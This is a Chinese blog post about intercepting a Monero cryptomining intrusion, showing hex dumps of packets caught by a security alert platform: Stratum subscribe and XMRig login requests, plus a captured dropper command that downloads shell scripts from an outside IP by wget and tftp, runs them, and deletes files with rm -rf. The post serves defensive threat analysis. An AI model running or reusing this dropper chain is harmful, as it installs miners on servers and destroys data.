每天拦截一个挖矿

已于 2024-04-23 08:43:43 修改
阅读量429 收藏
点赞数 3
分类专栏: 网络安全技术专栏 文章标签: 安全威胁分析
于 2024-04-22 10:28:12 首次发布
本文链接:https://blog.csdn.net/qq_43681990/article/details/138065171
版权

明御APT攻击预警平台截获挖矿告警,告警来自于40.43OA服务器
在这里插入图片描述

数据包情况
000000100020003000407B 22 69 64 22 3A 20 31   2C 20 22 6D 65 74 68 6F
64 22 3A 20 22 6D 69 6E   69 6E 67 2E 73 75 62 73
63 72 69 62 65 22 2C 20   22 70 61 72 61 6D 73 22
3A 20 5B 5D 2C 20 22 6A   73 6F 6E 72 70 63 22 3A
22 32 2E 30 22 7D 0A{"id": 1, "metho
d": "mining.subs
cribe", "params"
: [], "jsonrpc":
"2.0"}.

000000100020003000400050006000700080009000A0 :
00B0 :
00C0 :
00D0 :
00E000F00100011041 41 00 00 41 41 41 41   20 63 64 20 2F 74 6D 70
20 7C 7C 20 63 64 20 2F   76 61 72 2F 72 75 6E 20
7C 7C 20 63 64 20 2F 6D   6E 74 20 7C 7C 20 63 64
20 2F 72 6F 6F 74 20 7C   7C 20 63 64 20 2F 3B 20
77 67 65 74 20 68 74 74   70 3A 2F 2F 39 31 2E 39
32 2E 32 35 32 2E 31 33   30 2F 73 6E 79 70 65 2E
73 68 3B 20 63 68 6D 6F   64 20 37 37 37 20 73 6E
79 70 65 2E 73 68 3B 20   73 68 20 73 6E 79 70 65
2E 73 68 3B 20 74 66 74   70 20 39 31 2E 39 32 2E
32 35 32 2E 31 33 30 20   2D 63 20 67 65 74 20 74
66 74 70 31 2E 73 68 3B   20 63 68 6D 6F 64 20 37
37 37 20 74 66 74 70 31   2E 73 68 3B 20 73 68 20
74 66 74 70 31 2E 73 68   3B 20 74 66 74 70 20 2D
72 20 74 66 74 70 32 2E   73 68 20 2D 67 20 39 31
2E 39 32 2E 32 35 32 2E   31 33 30 3B 20 63 68 6D
6F 64 20 37 37 37 20 74   66 74 70 32 2E 73 68 3B
20 73 68 20 74 66 74 70   32 2E 73 68 3B 20 72 6D
20 2D 72 66 20 2A 0AAA..AAAA cd /tmp
|| cd /var/run
|| cd /mnt || cd
/root || cd /;
wget http://91.9
2.252.130/snype.
sh; chmod 777 sn
ype.sh; sh snype
.sh; tftp 91.92.
252.130 -c get t
ftp1.sh; chmod 7
77 tftp1.sh; sh
tftp1.sh; tftp -
r tftp2.sh -g 91
.92.252.130; chm
od 777 tftp2.sh;
sh tftp2.sh; rm
-rf *.

http://91.92.252.130/snype.sh

000000100020003000400050006000700080009000A0 :
00B0 :7B 22 69 64 22 3A 31 2C   22 6A 73 6F 6E 72 70 63
22 3A 22 32 2E 30 22 2C   22 6D 65 74 68 6F 64 22
3A 22 6C 6F 67 69 6E 22   2C 22 70 61 72 61 6D 73
22 3A 7B 22 6C 6F 67 69   6E 22 3A 22 59 4F 55 52
5F 57 41 4C 4C 45 54 5F   41 44 44 52 45 53 53 22
2C 22 70 61 73 73 22 3A   22 78 22 2C 22 61 67 65
6E 74 22 3A 22 58 4D 52   69 67 2F 36 2E 32 30 2E
30 2D 43 33 50 6F 6F 6C   22 2C 22 61 6C 67 6F 22
3A 5B 22 63 6E 2F 31 22   5D 2C 22 61 6C 67 6F 2D
70 65 72 66 22 3A 7B 22   63 6E 2F 31 22 3A 36 33
2E 33 32 30 33 38 32 32   33 32 34 38 39 37 36 7D
7D 7D 0A{"id":1,"jsonrpc
":"2.0","method"
:"login","params
":{"login":"YOUR
_WALLET_ADDRESS"
,"pass":"x","age
nt":"XMRig/6.20.
0-C3Pool","algo"
:["cn/1"],"algo-
perf":{"cn/1":63
.32038223248976}
}}.

在这里插入图片描述
百年的老挖矿了
在这里插入图片描述
门罗币挖矿

000000100020003000400050006000700080009000A0 :
00B0 :
00C0 :
00D0 :
00E000F00100011001200130014001500160017001807B 22 69 64 22 3A 31 2C   22 6A 73 6F 6E 72 70 63
22 3A 22 32 2E 30 22 2C   22 6D 65 74 68 6F 64 22
3A 22 6C 6F 67 69 6E 22   2C 22 70 61 72 61 6D 73
22 3A 7B 22 6C 6F 67 69   6E 22 3A 22 43 50 55 3A
20 31 32 43 2F 32 34 54   20 4D 65 6D 6F 72 79 3A
20 36 32 47 42 20 58 4D   52 69 67 3A 20 36 2E 36
2E 30 20 53 69 6E 63 65   3A 32 30 32 31 2F 31 2F
33 30 20 34 3A 32 38 3A   31 31 22 2C 22 70 61 73
73 22 3A 22 78 22 2C 22   61 67 65 6E 74 22 3A 22
58 4D 52 69 67 2F 36 2E   36 2E 30 20 28 4C 69 6E
75 78 20 78 38 36 5F 36   34 29 20 6C 69 62 75 76
2F 31 2E 34 30 2E 30 20   67 63 63 2F 39 2E 33 2E
31 22 2C 22 61 6C 67 6F   22 3A 5B 22 63 6E 2F 31
22 2C 22 63 6E 2F 32 22   2C 22 63 6E 2F 72 22 2C
22 63 6E 2F 66 61 73 74   22 2C 22 63 6E 2F 68 61
6C 66 22 2C 22 63 6E 2F   78 61 6F 22 2C 22 63 6E
2F 72 74 6F 22 2C 22 63   6E 2F 72 77 7A 22 2C 22
63 6E 2F 7A 6C 73 22 2C   22 63 6E 2F 64 6F 75 62
6C 65 22 2C 22 63 6E 2F   63 63 78 22 2C 22 72 78
2F 30 22 2C 22 72 78 2F   77 6F 77 22 2C 22 72 78
2F 61 72 71 22 2C 22 72   78 2F 73 66 78 22 2C 22
72 78 2F 6B 65 76 61 22   2C 22 61 72 67 6F 6E 32
2F 63 68 75 6B 77 61 22   2C 22 61 72 67 6F 6E 32
2F 63 68 75 6B 77 61 76   32 22 2C 22 61 72 67 6F
6E 32 2F 77 72 6B 7A 22   5D 7D 7D 0A{"id":1,"jsonrpc
":"2.0","method"
:"login","params
":{"login":"CPU:
12C/24T Memory:
62GB XMRig: 6.6
.0 Since:2021/1/
30 4:28:11","pas
s":"x","agent":"
XMRig/6.6.0 (Lin
ux x86_64) libuv
/1.40.0 gcc/9.3.
1","algo":["cn/1
","cn/2","cn/r",
"cn/fast","cn/ha
lf","cn/xao","cn
/rto","cn/rwz","
cn/zls","cn/doub
le","cn/ccx","rx
/0","rx/wow","rx
/arq","rx/sfx","
rx/keva","argon2
/chukwa","argon2
/chukwav2","argo
n2/wrkz"]}}.
IT技术伪专家
关注
专栏目录
溯源系列:溯源案例一
weixin_54626591的博客
01-06 1471
溯源案例一
网络安全事件应急响应实战二
悦分享
09-14 1万+
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业。新闻源网站一般权重较高,收录快,能够被搜索引擎优先收录,是黑灰产推广引流的必争之地,很容易成为被攻击的对象。短连接(short connnection)是相对于长连接而言的概念,指的是在数据传送过程中,只在需要发送数据时,才去建立一个连接,数据发送完成后,则断开此连接,即每次连接只完成一项业务的发送。
磁盘空间占用巨大的meta.db-wal文件缓存(tracker-miner-fs索引服务)彻底清除办法
Mark的博客
11-09 2264
磁盘空间占用巨大的meta.db-wal文件缓存(tracker-miner-fs索引服务)彻底清除办法
记一次xmrig挖矿病毒排查日记
weixin_43831977的博客
02-23 1425
一台运行了好久的服务器CPU使用率达到100%,脑海中第一个想法就是中病毒了,于是开始了我的杀毒之旅。 解决方案 登录服务器查异常进程 top -c 可以发现有个名为xmrig的进程CPU使用率98.7% kill掉异常进程 经过top命令发现异常进程的pid,通过kill命令杀掉进程 kill -9 15866 删除危险文件或目录 经过top命令发现异常进程的执行目录,删除危险目录 rm -rf c3pool/ 检测 可以使用top命令查看,我这里使用了shell脚本检测CPU、磁盘、内存使用
Ubuntu下tracker占用CPU过高
10-15 3586
解决方案参考:https://askubuntu.com/questions/346211/tracker-store-and-tracker-miner-fs-eating-up-my-cpu-on-every-startup#348692 将Hidden=true添加到所有tracker开头的文件末尾 echo -e "\nHidden=true\n"|sudo tee --append...
大厂面试必问命令!不要再说不了解了!详解+实例!
Linux猿
06-22 3318
Linux 面试必备命令 awk
服务器被植入挖矿病毒-xmrig
weixin_53299145的博客
09-24 2169
今天早晨登录宝塔面板发现服务器CPU占用率和内存都爆满了,赶紧检查一下服务器的进程使用top命令查看服务器的cpu和内存占用情况。
禁用 tracker-miner-fs 的方法
黄贺群的专栏
09-17 1万+
tracker-miner-fs 为 Tracker 文件系统挖掘器,用来抓取和处理文件系统上的文件。 该进程经常占用大量资源,如几个GB的内存,100% CPU 等。 下面是几个禁用的方法: 1. 对于Gnome,运行 gnome-session-properties 并把 tracker 相关的勾选取消。 2. 修改或新建以下三个文件: ~/.config/autosta
nginx使用301过滤黑客攻击
lionking1990的博客
05-14 1628
nginx使用301过滤黑客攻击nginx使用301过滤黑客攻击奇怪的访问被攻击内容开始防御日志的改进成果结论 nginx使用301过滤黑客攻击 2020/5/9随便翻看了一下公司网站的访问日志,发现有不少来自国外的攻击。 公司的网站只是用来宣传的,从搭建到设计都是我一个人做的,没有做得很华丽,也没有特别多的功能。 奇怪的访问 因为调度gzip压缩功能,所以看了一下日志。发现里面有不少404和400,截取一部分如下 77.247.108.77 - - [09/May/2020:11:51:30 +0900]
Drupal CVE-2018-7600 漏洞利用和攻击
weixin_34199405的博客
04-26 3959
背景介绍 2018年3月28日,Drupal Security Team官方发布了一个重要的安全公告,宣称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站,该漏洞就是:CVE-2018-7600。 此消息一出,蠢蠢欲动的黑客们立马如天降尚方宝剑,都在暗处磨刀霍...
商业银行终端安全管理创新与实践
最新发布
qq_41432686的博客
05-04 1002
随着银行业金融机构数字化转型的不断深入,以及移动互联网应用的蓬勃发展,网络攻击呈现明显的全球化、常态化、多样化趋势。计算机终端在承载业务系统访问、业务数据存储等功能的同时,也成为外部攻击的关键切入点。终端安全管理面临越来越高的挑战,一方面需要满足办公、业务、开发测试、对客服务等场景的使用要求;另一方面需要防范病毒传播、数据泄露、非授权访问、木马受控等多种风险。
清理linux上c3pool挖矿病毒xmrig
sulei627719296的博客
04-25 1193
因为kill -9杀掉进程之后会立即重启,需找到自启动服务,禁用后删除。检查是否有相关的定时任务,如果有定时任务则删除掉。找到所有相关的服务,全部删除。
安全】查杀linux上c3pool挖矿病毒xmrig
飞的博客
03-05 2084
病毒来源安装脚本旷池提供的卸载脚本。
清除xmrig病毒手记
gr13811787801的博客
05-25 7886
起因:2021-05-20日和21日公司的阿里云服务器发出报警提醒,有异常登录,由于外出工作没有及时查看和处理,直到21日下午查看时发现是有人暴力破解了服务器密码并成功登陆,这使我很震惊,毕竟阿里云也是有一定防护措施的,我们的密码也是随机生成的,得佩服一下这个黑客。登录的ip是两个国外地址,一个是新加坡(54.179.10.190)另外一个是博阿努瓦(51.222.40.232),赶紧对这两个ip进行拒绝登陆,可气的是这厮竟然修改了我的阿里云服务器的root登录密码,我不知道这个是怎么做到的,毕竟阿里云的r
xmrig挖矿病毒解决
热门推荐
yuguang的博客
11-20 1万+
1、问题排查显示 1.1服务器中情况 1.2后台查看情况 2、查看进程 [root@ecs-44a1 cron]# ll /proc/8236/exe lrwxrwxrwx 1 root root 0 Nov 20 10:52 /proc/8236/exe -> /etc/c3pool/xmrig [root@ecs-44a1 cron]# 3、查看进程文件 [root@ecs-44a1 cron]# ll /pr...
tracker-store和tracker-miner-fs在每次启动时吃掉我的CPU
hknaruto的专栏
11-09 2989
问题描述 每当我启动我的笔记本电脑时,tracker-store和tracker-miner-fs都会在30-40%之间耗尽我的CPU 10-15分钟。我在Ubuntu 12.04上。 这些流程有什么作用?如何摆脱过程? 最佳解决办法 脚本解决方案在Ubuntu 16.04上永久禁用它 正如评论中提到的,这篇文章中提到的文件在16.04中不再存在。您可以使用以下脚本: echo -e "\nHidden=true\n" | sudo tee --append /etc/xdg/autos.
明御:APT攻击预警平台
weixin_50906078的博客
05-06 5782
APT:高级持续性威胁,是一种利用先进的攻击手段对特定目标进行长期持续性的网络攻击的攻击形式。 产品介绍:APT攻击预警平台使用深度威胁检测技术,对流量进行深度解析,发现流量中的恶意攻击,提供了全面的检测和预警的功能。 本平台具备以下功能: 1、Web威胁深度检测 2、邮件威胁深度检测 3、病毒木马深度检测 4、0day攻击检测 5、异常行为分析 6、云端高级分析 感觉挺牛逼的吧!下面就了解一下检测的原理吧。 一、Web威胁深度检测 明御®APT 攻击预警平台通过对 Web 流量和应用进行深度检测,提供全面
tracker-miner-fs问题
qq_40489766的博客
08-06 1012
这玩意占了半G内存,百度也没百出来,有人说要禁用,但不知是干什么用的。 执行 apt searchtracker-miner-fs 输出了 tracker-miner-fs/stable,now 2.1.6-1 amd64 [已安装,自动] metadata database, indexer and search tool - filesystem indexer 谷歌翻译后为: 元数据数据库、索引器和搜索工具 - 文件系统索引器。 配置: debian10 104..
一个拦截
05-24
下面是一个简单的拦截器示例: ```java public class MyInterceptor implements HandlerInterceptor { @Override public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

IT技术伪专家

你的认可是对我最大的支持!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值